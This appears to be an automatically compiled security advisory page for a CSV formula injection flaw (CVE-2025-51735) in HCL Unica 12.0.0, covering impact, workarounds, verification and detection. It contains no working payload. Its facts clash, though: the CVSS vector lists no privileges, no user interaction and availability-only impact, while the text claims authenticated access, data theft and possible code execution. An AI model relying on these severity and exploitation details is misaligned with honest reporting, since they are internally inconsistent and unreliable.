CVE-2025-51735 – This CSV formula injection vulnerability in HCL... (How to Fix)

📋 TL;DR

This CSV formula injection vulnerability in HCL Unica 12.0.0 allows attackers to execute arbitrary formulas when CSV files are opened in spreadsheet applications like Microsoft Excel. Attackers can potentially execute commands, exfiltrate data, or perform other malicious actions through crafted CSV exports. This affects organizations using HCL Unica 12.0.0 for marketing automation.

💻 Affected Systems

Products:

HCL Unica

Versions: 12.0.0

Operating Systems: All platforms running HCL Unica

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists in CSV export functionality; exploitation requires users to open generated CSV files in vulnerable spreadsheet applications.

📦 What is this software?

Unica by Hcltech

View all CVEs affecting Unica →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote code execution on client systems when users open malicious CSV exports in vulnerable spreadsheet applications, potentially leading to full system compromise, data theft, and lateral movement within the network.

🟠

Likely Case

Data exfiltration and limited command execution on client workstations when users open exported CSV files, potentially compromising sensitive marketing data and user credentials.

🟢

If Mitigated

Limited impact with proper user training and security controls, potentially only causing spreadsheet application crashes or formula errors.

🌐 Internet-Facing: MEDIUM - While the vulnerability requires user interaction (opening CSV files), internet-facing Unica instances could be targeted to generate malicious exports.

🏢 Internal Only: HIGH - Internal users regularly export and share CSV files, creating multiple opportunities for exploitation through phishing or compromised accounts.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access to generate CSV exports; public proof-of-concept demonstrates formula injection techniques.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not available

Vendor Advisory: Not available

Restart Required: No

Instructions:

1. Monitor HCL security advisories for patch availability
2. Apply patch when released following vendor instructions
3. Test in non-production environment first

🔧 Temporary Workarounds

CSV Sanitization

all

Implement server-side CSV sanitization to escape or remove formula characters (=, +, -, @) from exported data

User Training

all

Train users to open CSV files in text editors first or use 'Import Data' features instead of direct opening

🧯 If You Can't Patch

Restrict CSV export permissions to trusted users only
Implement DLP solutions to block CSV files containing formula characters from email and file transfers

🔍 How to Verify

Check if Vulnerable:

Test CSV export functionality by exporting data containing formula characters (=, +, -, @) and checking if they're properly escaped in output

Check Version:

Check Unica version through admin interface or application logs

Verify Fix Applied:

Verify CSV exports properly escape formula characters and open safely in spreadsheet applications

📡 Detection & Monitoring

Log Indicators:

Unusual CSV export patterns
Multiple failed export attempts
Large CSV exports by single users

Network Indicators:

Unusual outbound CSV file transfers
CSV files containing formula characters in network traffic

SIEM Query:

source="unica" AND (event="csv_export" OR file_type="csv") AND user!=admin_user | stats count by user

📊 Metadata

CVE ID: CVE-2025-51735

CVSS v3 Score: 7.5 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE: CWE-1236

EPSS Score: 0.07% exploit probability (20.6th percentile)

Published: November 28, 2025

Last Updated: December 2, 2025

🔗 References

https://gist.github.com/ikpehlivan/4361fa808e04d884e4771be88e891ec2 Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-51735, you might also want to check these: